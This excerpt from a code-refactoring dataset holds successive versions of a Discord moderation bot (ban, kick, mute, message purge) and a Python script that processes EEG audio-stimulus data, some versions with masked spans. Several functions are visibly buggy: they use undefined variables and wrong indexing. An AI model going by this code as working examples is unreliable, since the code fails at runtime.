"step-4": "import discord\nfrom discord.ext import commands\nimport datetime\nfrom discord.utils import get\nfrom discord import User\n\n\nclass Sinner(commands.Converter):\n\n async def convert(self, ctx, argument):\n argument = await commands.MemberConverter().convert(ctx, argument)\n permission = argument.guild_permissions.manage_messages\n if not permission:\n return argument\n else:\n raise commands.BadArgument('You cannot punish other staff members')\n\n\nclass Redeemed(commands.Converter):\n\n async def convert(self, ctx, argument):\n argument = await commands.MemberConverter().convert(ctx, argument)\n muted = discord.utils.get(ctx.guild.roles, name='Muted')\n if muted in argument.roles:\n return argument\n else:\n raise commands.BadArgument('The user was not muted.')\n\n\nasync def mute(ctx, user, reason='No reason'):\n role = discord.utils.get(ctx.guild.roles, name='Muted')\n if not role:\n try:\n muted = await ctx.guild.create_role(name='Muted', reason=\n 'To use for muting')\n for channel in ctx.guild.channels:\n await channel.set_permissions(muted, send_messages=False,\n read_message_history=False, read_messages=False)\n except discord.Forbidden:\n return await ctx.send('I have no permissions to make a muted role')\n await user.add_roles(muted)\n await ctx.send(f'{user.mention} has been muted for {reason}')\n else:\n await user.add_roles(role)\n await ctx.send(f'{user.mention} has been muted for {reason}')\n channel = ctx.bot.get_channel(718865797006753892)\n await channel.send(f'{user.mention}, welcome to the bad kids club.')\n\n\nclass Moderation(commands.Cog):\n \"\"\"Moderation Commands\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name='ban')\n @commands.has_permissions(ban_members=True)\n async def ban(self, ctx, member: discord.Member, *, reason='No reason'):\n \"\"\"Bans someone\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send('You cannot ban yourself!')\n return\n try:\n memberid = await self.bot.fetch_user(int(member))\n await member.ban(reason=reason) or await memberid.ban(reason=reason\n )\n except discord.Forbidden:\n await ctx.send(\n f'It looks like i dont have the permission `BAN_MEMBERS` to do this. Please check my permissions and try running the command again.'\n )\n else:\n embed = discord.Embed(title=f'`{ctx.author}` banned {member}',\n colour=member.color, timestamp=datetime.datetime.utcnow())\n embed.add_field(name='● Details:', value=f' - Reason: {reason}')\n embed.set_footer(icon_url=f'{ctx.author.avatar_url}', text=\n f'{ctx.author.top_role.name} ')\n await ctx.send(embed=embed)\n print(ctx.author.name, 'used the command ban')\n\n @commands.command()\n @commands.has_permissions(ban_members=True)\n async def unban(self, ctx, member, *, reason='No reason'):\n print('unbanned')\n if member == None or member == ctx.message.author:\n await ctx.send('You cannot unban yourself!')\n return\n try:\n member = await self.bot.fetch_user(int(member))\n await ctx.guild.unban(member, reason=reason)\n except discord.Forbidden:\n await ctx.send(\n f'It looks like i dont have the permission `BAN_MEMBERS` to do this. 
Please check my permissions and try running the command again.'\n )\n else:\n await ctx.send(f'`{member}` was unbanned by **{ctx.author.name}**.'\n )\n print(ctx.author.name, 'used the command unban')\n\n @commands.command(name='kick')\n @commands.has_permissions(kick_members=True)\n async def kick(self, ctx, member: discord.Member, *, reason='No reason'):\n \"\"\"Kicks someone\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send('You cannot kick yourself!')\n return\n try:\n await member.kick(reason=reason)\n except discord.Forbidden:\n await ctx.send(\n f'It looks like i dont have the permission `KICK_MEMBERS` to do this. Please check my permissions and try running the command again.'\n )\n else:\n embed = discord.Embed(title=f'`{ctx.author}` kicked {member}',\n colour=member.color, timestamp=datetime.datetime.utcnow())\n embed.add_field(name='● Details:', value=f' - Reason: {reason}')\n embed.set_footer(icon_url=f'{ctx.author.avatar_url}', text=\n f'{ctx.author.top_role.name} ')\n await ctx.send(embed=embed)\n print(ctx.author.name, 'used the command kick')\n\n @commands.command(name='clear')\n @commands.has_permissions(manage_messages=True)\n async def clear(self, ctx, amount: int):\n \"\"\"Clears messages.\"\"\"\n channel = ctx.channel\n try:\n await channel.purge(limit=amount + 1)\n except discord.Forbidden:\n await ctx.send(\n f'It looks like i dont have the permission `MANAGE_MESSAGES` to do this. Please check my permissions and try running the command again.'\n )\n else:\n await ctx.send(f'{amount} messages deleted.')\n\n @clear.error\n async def clear_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\n \"You need to specify an amount of messages, i can't purge air...\"\n )\n if isinstance(error, commands.BadArgument):\n await ctx.send('Give me a valid number.')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permission to use this command.\"\n )\n raise error\n\n @kick.error\n async def kick_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who to kick.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permission to use this command.\"\n )\n raise error\n\n @ban.error\n async def ban_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who to ban.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?.')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permission to use this command.\"\n )\n raise error\n\n @commands.command()\n async def mute(self, ctx, user: Sinner, reason=None):\n \"\"\"Mutes a user.\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send('You cannot mute yourself!')\n return\n await mute(ctx, user, reason or 'treason')\n\n @commands.command()\n async def unmute(self, ctx, user: Redeemed):\n \"\"\"Unmutes a muted user\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send('You cannot unmute yourself!')\n return\n await user.remove_roles(discord.utils.get(ctx.guild.roles, name=\n 'Muted'))\n await ctx.send(f'{user.mention} has been unmuted')\n\n @mute.error\n async def mute_error(self, ctx, error):\n if isinstance(error, 
commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who do you want to mute.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permissions to use this command.\"\n )\n\n @unmute.error\n async def unmute_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who do you want to unmute.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permissions to use this command.\"\n )\n\n @unban.error\n async def unban_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send('You need to tell me who do you want to unban.')\n if isinstance(error, commands.BadArgument):\n await ctx.send('Is that a person?')\n if isinstance(error, commands.CheckFailure):\n await ctx.send(\n f\"{ctx.author.name}, you don't have permissions to use this command.\"\n )\n\n\ndef setup(bot):\n bot.add_cog(Moderation(bot))\n",
"step-5": "import discord\nfrom discord.ext import commands\nimport datetime\nfrom discord.utils import get\nfrom discord import User\n\nclass Sinner(commands.Converter):\n async def convert(self, ctx, argument):\n argument = await commands.MemberConverter().convert(ctx, argument)\n permission = argument.guild_permissions.manage_messages \n if not permission:\n return argument \n else:\n raise commands.BadArgument(\"You cannot punish other staff members\") \n\n\nclass Redeemed(commands.Converter):\n async def convert(self, ctx, argument):\n argument = await commands.MemberConverter().convert(ctx, argument)\n muted = discord.utils.get(ctx.guild.roles, name=\"Muted\") \n if muted in argument.roles:\n return argument\n else:\n raise commands.BadArgument(\"The user was not muted.\") \n \n\nasync def mute(ctx, user, reason=\"No reason\"):\n role = discord.utils.get(ctx.guild.roles, name=\"Muted\") \n if not role: \n try: \n muted = await ctx.guild.create_role(name=\"Muted\", reason=\"To use for muting\")\n for channel in ctx.guild.channels: \n await channel.set_permissions(muted, send_messages=False,\n read_message_history=False,\n read_messages=False)\n except discord.Forbidden:\n return await ctx.send(\"I have no permissions to make a muted role\")\n await user.add_roles(muted) \n await ctx.send(f\"{user.mention} has been muted for {reason}\")\n else:\n await user.add_roles(role) \n await ctx.send(f\"{user.mention} has been muted for {reason}\")\n channel = ctx.bot.get_channel(718865797006753892)\n await channel.send(f\"{user.mention}, welcome to the bad kids club.\")\n\nclass Moderation(commands.Cog):\n \"\"\"Moderation Commands\"\"\"\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name=\"ban\")\n @commands.has_permissions(ban_members=True)\n async def ban(self, ctx, member: discord.Member, *, reason=\"No reason\"):\n \"\"\"Bans someone\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send(\"You cannot ban yourself!\")\n return\n try:\n memberid = await self.bot.fetch_user(int(member)) \n await member.ban(reason=reason) or await memberid.ban(reason=reason)\n except discord.Forbidden:\n await ctx.send(f\"It looks like i dont have the permission `BAN_MEMBERS` to do this. Please check my permissions and try running the command again.\") \n else:\n embed = discord.Embed(title=f\"`{ctx.author}` banned {member}\", colour=member.color, timestamp=datetime.datetime.utcnow())\n embed.add_field(name=\"● Details:\", value=f\" - Reason: {reason}\")\n embed.set_footer(icon_url=f\"{ctx.author.avatar_url}\", text=f\"{ctx.author.top_role.name} \")\n await ctx.send(embed=embed)\n print(ctx.author.name, 'used the command ban')\n\n @commands.command()\n @commands.has_permissions(ban_members=True)\n async def unban(self, ctx, member, *, reason=\"No reason\"):\n print(\"unbanned\")\n if member == None or member == ctx.message.author:\n await ctx.send(\"You cannot unban yourself!\")\n return\n try:\n member = await self.bot.fetch_user(int(member))\n await ctx.guild.unban(member, reason=reason)\n except discord.Forbidden:\n await ctx.send(f\"It looks like i dont have the permission `BAN_MEMBERS` to do this. 
Please check my permissions and try running the command again.\")\n else:\n await ctx.send(f\"`{member}` was unbanned by **{ctx.author.name}**.\")\n print(ctx.author.name, 'used the command unban')\n\n @commands.command(name=\"kick\")\n @commands.has_permissions(kick_members=True)\n async def kick(self, ctx, member: discord.Member, *, reason=\"No reason\"):\n \"\"\"Kicks someone\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send(\"You cannot kick yourself!\")\n return\n try:\n await member.kick(reason=reason)\n except discord.Forbidden: \n await ctx.send(f\"It looks like i dont have the permission `KICK_MEMBERS` to do this. Please check my permissions and try running the command again.\")\n else:\n embed = discord.Embed(title=f\"`{ctx.author}` kicked {member}\", colour=member.color, timestamp=datetime.datetime.utcnow())\n embed.add_field(name=\"● Details:\", value=f\" - Reason: {reason}\")\n embed.set_footer(icon_url=f\"{ctx.author.avatar_url}\", text=f\"{ctx.author.top_role.name} \")\n await ctx.send(embed=embed)\n print(ctx.author.name, 'used the command kick')\n\n\n @commands.command(name=\"clear\")\n @commands.has_permissions(manage_messages=True)\n async def clear(self, ctx, amount: int):\n \"\"\"Clears messages.\"\"\"\n channel = ctx.channel\n try:\n await channel.purge(limit=amount+1)\n except discord.Forbidden:\n await ctx.send(f\"It looks like i dont have the permission `MANAGE_MESSAGES` to do this. Please check my permissions and try running the command again.\")\n else:\n await ctx.send(f\"{amount} messages deleted.\")\n\n @clear.error\n async def clear_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\"You need to specify an amount of messages, i can't purge air...\")\n if isinstance(error, commands.BadArgument):\n await ctx.send(\"Give me a valid number.\")\n if isinstance(error, commands.CheckFailure):\n await ctx.send(f\"{ctx.author.name}, you don't have permission to use this command.\") \n\n raise error \n\n @kick.error\n async def kick_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\"You need to tell me who to kick.\")\n if isinstance(error, commands.BadArgument):\n await ctx.send(\"Is that a person?\")\n if isinstance(error, commands.CheckFailure):\n await ctx.send(f\"{ctx.author.name}, you don't have permission to use this command.\") \n\n raise error \n\n\n @ban.error\n async def ban_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\"You need to tell me who to ban.\")\n if isinstance(error, commands.BadArgument):\n await ctx.send(\"Is that a person?.\")\n if isinstance(error, commands.CheckFailure):\n await ctx.send(f\"{ctx.author.name}, you don't have permission to use this command.\") \n\n raise error\n\n @commands.command()\n async def mute(self, ctx, user: Sinner, reason=None):\n \"\"\"Mutes a user.\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send(\"You cannot mute yourself!\")\n return \n await mute(ctx, user, reason or \"treason\")\n\n @commands.command()\n async def unmute(self, ctx, user: Redeemed):\n \"\"\"Unmutes a muted user\"\"\"\n if member == None or member == ctx.message.author:\n await ctx.send(\"You cannot unmute yourself!\")\n return \n await user.remove_roles(discord.utils.get(ctx.guild.roles, name=\"Muted\"))\n await ctx.send(f\"{user.mention} has been unmuted\")\n\n\n @mute.error\n async def mute_error(self, ctx, error):\n if isinstance(error, 
commands.MissingRequiredArgument):\n await ctx.send(\"You need to tell me who do you want to mute.\")\n if isinstance(error, commands.BadArgument):\n await ctx.send(\"Is that a person?\")\n if isinstance(error, commands.CheckFailure):\n await ctx.send(f\"{ctx.author.name}, you don't have permissions to use this command.\")\n\n @unmute.error\n async def unmute_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\"You need to tell me who do you want to unmute.\")\n if isinstance(error, commands.BadArgument):\n await ctx.send(\"Is that a person?\")\n if isinstance(error, commands.CheckFailure):\n await ctx.send(f\"{ctx.author.name}, you don't have permissions to use this command.\")\n\n @unban.error\n async def unban_error(self, ctx, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\"You need to tell me who do you want to unban.\")\n if isinstance(error, commands.BadArgument):\n await ctx.send(\"Is that a person?\")\n if isinstance(error, commands.CheckFailure):\n await ctx.send(f\"{ctx.author.name}, you don't have permissions to use this command.\")\n\ndef setup(bot):\n bot.add_cog(Moderation(bot))\n",
"step-ids": [
4,
5,
7,
8,
9
]
}
|
[
4,
5,
7,
8,
9
] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu May 7 03:41:18 2020
@author: owlthekasra
"""
import methods as md
import add_label as al
import numpy as np
import pandas as pd
import random
sb_rd_1 = '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass/trials_2'
sb_rd_2 = '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass/trials_3'
sb_rd_3 = '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass/extra_deleted_metadata'
ns_rd_1 = '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/no_sound/trials_1'
ns_rd_2 = '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/no_sound/trials_2'
sbt_rd_1 = '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass_thought/trials_1'
df_sine_bass_trials = al.get_long_dataframe(sb_rd_1).append(al.get_long_dataframe(sb_rd_2))
df_no_sound_trials = al.get_long_dataframe(ns_rd_1).append(al.get_long_dataframe(ns_rd_2))
df_sine_bass_thought_trials = al.get_long_dataframe(sbt_rd_1)
# _, df_sine_bass_extra = al.get_all_dataframes(sb_rd_3, 1)
# _, df_sine_bass_trials_2 = al.get_all_dataframes(sb_rd_1, 1)
# _, df_sine_bass_trials_3 = al.get_all_dataframes(sb_rd_2, 1)
# _, df_no_sound_trials_1 = al.get_all_dataframes(ns_rd_1, 0)
# _, df_no_sound_trials_2 = al.get_all_dataframes(ns_rd_2, 0)
# _, df_sine_bass_thought_trials_1 = al.get_all_dataframes(sbt_rd_1, 2)
# diff_labels = [df_sine_bass_thought_trials_1, df_sine_bass_extra, df_sine_bass_trials_2, df_sine_bass_trials_3, df_no_sound_trials_1, df_no_sound_trials_2]
# big_frame = pd.concat(diff_labels, ignore_index=True)
# bg = big_frame.iloc[:, :513]
# sound = bg[bg["label"]==1].iloc[:,1:]
# nosound = bg[bg["label"]==0].iloc[:,1:]
# imagesound = bg[bg["label"]==2].iloc[:,1:]
def get_X_and_y(df, start=1):
y = df[['label']]
    X = df.iloc[:, start:]  # .iloc is required; plain df[:, start:] raises TypeError on a DataFrame
return (X, y)
def subtract_moving_average(df, n=50):
    k = n
    bgnorm = pd.DataFrame(np.zeros((len(df), len(df.columns))))
    for j in range(0, len(df)):
        for i in range(0, len(df.columns)):
            # define the +/- k window around column i, clipped to the frame
            # (was max(1, ...), which silently skipped column 0)
            indices = range(max(0, i - k), min(i + k, len(df.columns)))
            avg = df.iloc[j, :]
            avg = avg.iloc[indices].mean()
            newnum = df.iloc[j, i] - avg
            # print(newnum)  # debug: one line per cell, very noisy on a 3600x516 frame
            bgnorm.iloc[j, i] = newnum
    return bgnorm
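# Minimal sanity sketch for subtract_moving_average (toy data, illustrative
# only): a constant row minus its own moving average should be ~0 everywhere.
#   toy = pd.DataFrame([[1.0] * 200])
#   assert subtract_moving_average(toy, n=50).abs().max().max() < 1e-9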
# #preprocess thought sine wave only
# y_values_thought = df_sine_bass_thought_trials_1.iloc[:, 0]
# X_values_thought = df_sine_bass_thought_trials_1.iloc[:, 132:660]
# df_thought = pd.concat([y_values_thought, X_values_thought], axis=1, ignore_index=True)
# NOTE: `sound` (and `bg`/`lab` below) are only defined in the commented-out
# big_frame block above; uncomment that block before running this part.
snd = pd.DataFrame()
# sn2 = sound.reset_index().iloc[:,1:].T
for i in range(0, len(sound) // 4):
    snd = pd.concat([snd, sound.iloc[i * 4:i * 4 + 4, :]], axis=1)
#separate channels into different dataframes
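# with 4 interleaved channels, ::4 picks rows 0, 4, 8, ... (channel 1),
# 1::4 picks rows 1, 5, 9, ... (channel 2), and so on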
bg1 = bg.iloc[::4, :]
bg2 = bg.iloc[1::4, :]
bg3 = bg.iloc[2::4, :]
bg4 = bg.iloc[3::4, :]
bigX = bg.iloc[:, 1:]
bigy = bg.iloc[:,0]
#subtracting average of each row
# NB: `lab` is only defined further down; this line would raise a NameError
# and shadows the bg-based bigX above -- it looks like interactive leftovers.
# bigX = lab.iloc[:, 1:]
print(len(bigX.columns), len(bigX))  # quick shape check
bgnorm = subtract_moving_average(bigX)
bgnormlab = pd.concat([bigy, bgnorm], axis=1)
bgnormlab.to_csv('bgnormalized3600x517.csv')
bgnormlab = pd.read_csv('/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/csv/bgnormalized3600x517.csv')
j3 = pd.DataFrame()
def get_mean_down_df(df, nchan=4):
    # collapse every nchan consecutive rows (one per channel) into their mean
    avg_df = pd.DataFrame()
    for i in range(1, len(df) + 1):
        if i % nchan == 0:
            j5 = range(i - nchan, i)
            j1 = df.iloc[j5, :]
            k1 = j1.mean()
            # DataFrame.append is deprecated in recent pandas;
            # pd.concat([avg_df, k1.to_frame().T]) is the modern equivalent
            avg_df = avg_df.append(k1, ignore_index=True)
    return avg_df
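# Illustrative sketch (toy numbers, not project data): an 8x2 frame with
# nchan=4 collapses to 2 rows, each the column-wise mean of 4 raw rows.
#   toy = pd.DataFrame(np.arange(16.0).reshape(8, 2))
#   get_mean_down_df(toy)  # -> rows [3.0, 4.0] and [11.0, 12.0]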
j5 = range(0,8)
j1 = bigX.iloc[j5, :]
bgnormavg = get_mean_down_df(bgnormlab)
lab = bgnormavg.iloc[:, -1]
# appending a DataFrame onto a Series gives a mixed object; the apparent
# intent (label column moved to the front) would be something like
# pd.concat([bgnormavg.iloc[:, -1], bgnormavg.iloc[:, :-1]], axis=1)
lab = lab.append(bgnormavg.iloc[:, :-1])
indices = range(397, 417)
j1 = lab.iloc[1, :].iloc[1:]
j2 = j1.iloc[indices]
j3 = j2.mean()
random.seed(100)
np.random.seed(100)  # pandas .sample draws from numpy, not the stdlib random
# bssss = bgnormavg.drop(columns=['Unnamed: 0'])
main = bg1.sample(frac=1)
main = main.reset_index()
main = main.iloc[:, 1:]
train = main.iloc[:650]
val = main.iloc[650:]
# main2 = main.sample(frac=1)
# NOTE: the original indexed `main` here, which leaks the validation rows
# into training; `train` matches the 650-row split above.
X_train = train.iloc[:, 1:]
y_train = train['label']
X_val = val.iloc[:, 1:]
y_val = val['label']
model, acc, pred, y_test = md.fitPredictValSet(X_train, y_train, X_val, y_val, 'tree')
print(indices)
|
normal
|
{
"blob_id": "54d714d1e4d52911bcadf3800e7afcc2c9a615a5",
"index": 6743,
"step-1": "<mask token>\n\n\ndef subtract_moving_average(df, n=50):\n k = n\n bgnorm = pd.DataFrame(np.zeros((len(df), len(df.columns))))\n for j in range(0, len(df)):\n for i in range(0, len(df.columns)):\n indices = range(max(1, i - k), min(i + k, len(df.columns)))\n avg = df.iloc[j, :]\n avg = avg.iloc[indices].mean()\n newnum = df.iloc[j, i] - avg\n print(newnum)\n bgnorm.iloc[j, i] = newnum\n return bgnorm\n\n\n<mask token>\n\n\ndef get_mean_down_df(df, nchan=4):\n avg_df = pd.DataFrame()\n for i in range(1, len(df) + 1):\n if i % nchan == 0:\n j5 = range(i - nchan, i)\n j1 = df.iloc[j5, :]\n k1 = j1.mean()\n avg_df = avg_df.append(k1, ignore_index=True)\n return avg_df\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_X_and_y(df, start=1):\n y = df[['label']]\n X = df[:, start:]\n return X, y\n\n\ndef subtract_moving_average(df, n=50):\n k = n\n bgnorm = pd.DataFrame(np.zeros((len(df), len(df.columns))))\n for j in range(0, len(df)):\n for i in range(0, len(df.columns)):\n indices = range(max(1, i - k), min(i + k, len(df.columns)))\n avg = df.iloc[j, :]\n avg = avg.iloc[indices].mean()\n newnum = df.iloc[j, i] - avg\n print(newnum)\n bgnorm.iloc[j, i] = newnum\n return bgnorm\n\n\n<mask token>\nfor i in range(0, int(len(sound) / 4)):\n snd = pd.concat([snd, sound.iloc[i * 4:i * 4 + 4, :]], axis=1)\n<mask token>\nlen(bigX.columns)\nlen(bigX)\n<mask token>\nbgnormlab.to_csv('bgnormalized3600x517.csv')\n<mask token>\n\n\ndef get_mean_down_df(df, nchan=4):\n avg_df = pd.DataFrame()\n for i in range(1, len(df) + 1):\n if i % nchan == 0:\n j5 = range(i - nchan, i)\n j1 = df.iloc[j5, :]\n k1 = j1.mean()\n avg_df = avg_df.append(k1, ignore_index=True)\n return avg_df\n\n\n<mask token>\nrandom.seed(100)\n<mask token>\nprint(indices)\n",
"step-3": "<mask token>\nsb_rd_1 = (\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass/trials_2'\n )\nsb_rd_2 = (\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass/trials_3'\n )\nsb_rd_3 = (\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass/extra_deleted_metadata'\n )\nns_rd_1 = (\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/no_sound/trials_1'\n )\nns_rd_2 = (\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/no_sound/trials_2'\n )\nsbt_rd_1 = (\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass_thought/trials_1'\n )\ndf_sine_bass_trials = al.get_long_dataframe(sb_rd_1).append(al.\n get_long_dataframe(sb_rd_2))\ndf_no_sound_trials = al.get_long_dataframe(ns_rd_1).append(al.\n get_long_dataframe(ns_rd_2))\ndf_sine_bass_thought_trials = al.get_long_dataframe(sbt_rd_1)\n\n\ndef get_X_and_y(df, start=1):\n y = df[['label']]\n X = df[:, start:]\n return X, y\n\n\ndef subtract_moving_average(df, n=50):\n k = n\n bgnorm = pd.DataFrame(np.zeros((len(df), len(df.columns))))\n for j in range(0, len(df)):\n for i in range(0, len(df.columns)):\n indices = range(max(1, i - k), min(i + k, len(df.columns)))\n avg = df.iloc[j, :]\n avg = avg.iloc[indices].mean()\n newnum = df.iloc[j, i] - avg\n print(newnum)\n bgnorm.iloc[j, i] = newnum\n return bgnorm\n\n\nsnd = pd.DataFrame()\nfor i in range(0, int(len(sound) / 4)):\n snd = pd.concat([snd, sound.iloc[i * 4:i * 4 + 4, :]], axis=1)\nbg1 = bg.iloc[::4, :]\nbg2 = bg.iloc[1::4, :]\nbg3 = bg.iloc[2::4, :]\nbg4 = bg.iloc[3::4, :]\nbigX = bg.iloc[:, 1:]\nbigy = bg.iloc[:, 0]\nbigX = lab.iloc[:, 1:]\nlen(bigX.columns)\nlen(bigX)\nbgnorm = subtract_moving_average(bigX)\nbgnormlab = pd.concat([bigy, bgnorm], axis=1)\nbgnormlab.to_csv('bgnormalized3600x517.csv')\nbgnormlab = pd.read_csv(\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/csv/bgnormalized3600x517.csv'\n )\nj3 = pd.DataFrame()\n\n\ndef get_mean_down_df(df, nchan=4):\n avg_df = pd.DataFrame()\n for i in range(1, len(df) + 1):\n if i % nchan == 0:\n j5 = range(i - nchan, i)\n j1 = df.iloc[j5, :]\n k1 = j1.mean()\n avg_df = avg_df.append(k1, ignore_index=True)\n return avg_df\n\n\nj5 = range(0, 8)\nj1 = bigX.iloc[j5, :]\nbgnormavg = get_mean_down_df(bgnormlab)\nlab = bgnormavg.iloc[:, -1]\nlab = lab.append(bgnormavg.iloc[:, :-1])\nindices = range(397, 417)\nj1 = lab.iloc[1, :].iloc[1:]\nj2 = j1.iloc[indices]\nj3 = j2.mean()\nrandom.seed(100)\nmain = bg1.sample(frac=1)\nmain = main.reset_index()\nmain = main.iloc[:, 1:]\ntrain = main.iloc[:650]\nval = main.iloc[650:]\nX_train = main.iloc[:, 1:]\ny_train = main['label']\nX_val = val.iloc[:, 1:]\ny_val = val['label']\nmodel, acc, pred, y_test = md.fitPredictValSet(X_train, y_train, X_val,\n y_val, 'tree')\nprint(indices)\n",
"step-4": "<mask token>\nimport methods as md\nimport add_label as al\nimport numpy as np\nimport pandas as pd\nimport random\nsb_rd_1 = (\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass/trials_2'\n )\nsb_rd_2 = (\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass/trials_3'\n )\nsb_rd_3 = (\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass/extra_deleted_metadata'\n )\nns_rd_1 = (\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/no_sound/trials_1'\n )\nns_rd_2 = (\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/no_sound/trials_2'\n )\nsbt_rd_1 = (\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass_thought/trials_1'\n )\ndf_sine_bass_trials = al.get_long_dataframe(sb_rd_1).append(al.\n get_long_dataframe(sb_rd_2))\ndf_no_sound_trials = al.get_long_dataframe(ns_rd_1).append(al.\n get_long_dataframe(ns_rd_2))\ndf_sine_bass_thought_trials = al.get_long_dataframe(sbt_rd_1)\n\n\ndef get_X_and_y(df, start=1):\n y = df[['label']]\n X = df[:, start:]\n return X, y\n\n\ndef subtract_moving_average(df, n=50):\n k = n\n bgnorm = pd.DataFrame(np.zeros((len(df), len(df.columns))))\n for j in range(0, len(df)):\n for i in range(0, len(df.columns)):\n indices = range(max(1, i - k), min(i + k, len(df.columns)))\n avg = df.iloc[j, :]\n avg = avg.iloc[indices].mean()\n newnum = df.iloc[j, i] - avg\n print(newnum)\n bgnorm.iloc[j, i] = newnum\n return bgnorm\n\n\nsnd = pd.DataFrame()\nfor i in range(0, int(len(sound) / 4)):\n snd = pd.concat([snd, sound.iloc[i * 4:i * 4 + 4, :]], axis=1)\nbg1 = bg.iloc[::4, :]\nbg2 = bg.iloc[1::4, :]\nbg3 = bg.iloc[2::4, :]\nbg4 = bg.iloc[3::4, :]\nbigX = bg.iloc[:, 1:]\nbigy = bg.iloc[:, 0]\nbigX = lab.iloc[:, 1:]\nlen(bigX.columns)\nlen(bigX)\nbgnorm = subtract_moving_average(bigX)\nbgnormlab = pd.concat([bigy, bgnorm], axis=1)\nbgnormlab.to_csv('bgnormalized3600x517.csv')\nbgnormlab = pd.read_csv(\n '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/csv/bgnormalized3600x517.csv'\n )\nj3 = pd.DataFrame()\n\n\ndef get_mean_down_df(df, nchan=4):\n avg_df = pd.DataFrame()\n for i in range(1, len(df) + 1):\n if i % nchan == 0:\n j5 = range(i - nchan, i)\n j1 = df.iloc[j5, :]\n k1 = j1.mean()\n avg_df = avg_df.append(k1, ignore_index=True)\n return avg_df\n\n\nj5 = range(0, 8)\nj1 = bigX.iloc[j5, :]\nbgnormavg = get_mean_down_df(bgnormlab)\nlab = bgnormavg.iloc[:, -1]\nlab = lab.append(bgnormavg.iloc[:, :-1])\nindices = range(397, 417)\nj1 = lab.iloc[1, :].iloc[1:]\nj2 = j1.iloc[indices]\nj3 = j2.mean()\nrandom.seed(100)\nmain = bg1.sample(frac=1)\nmain = main.reset_index()\nmain = main.iloc[:, 1:]\ntrain = main.iloc[:650]\nval = main.iloc[650:]\nX_train = main.iloc[:, 1:]\ny_train = main['label']\nX_val = val.iloc[:, 1:]\ny_val = val['label']\nmodel, acc, pred, y_test = md.fitPredictValSet(X_train, y_train, X_val,\n y_val, 'tree')\nprint(indices)\n",
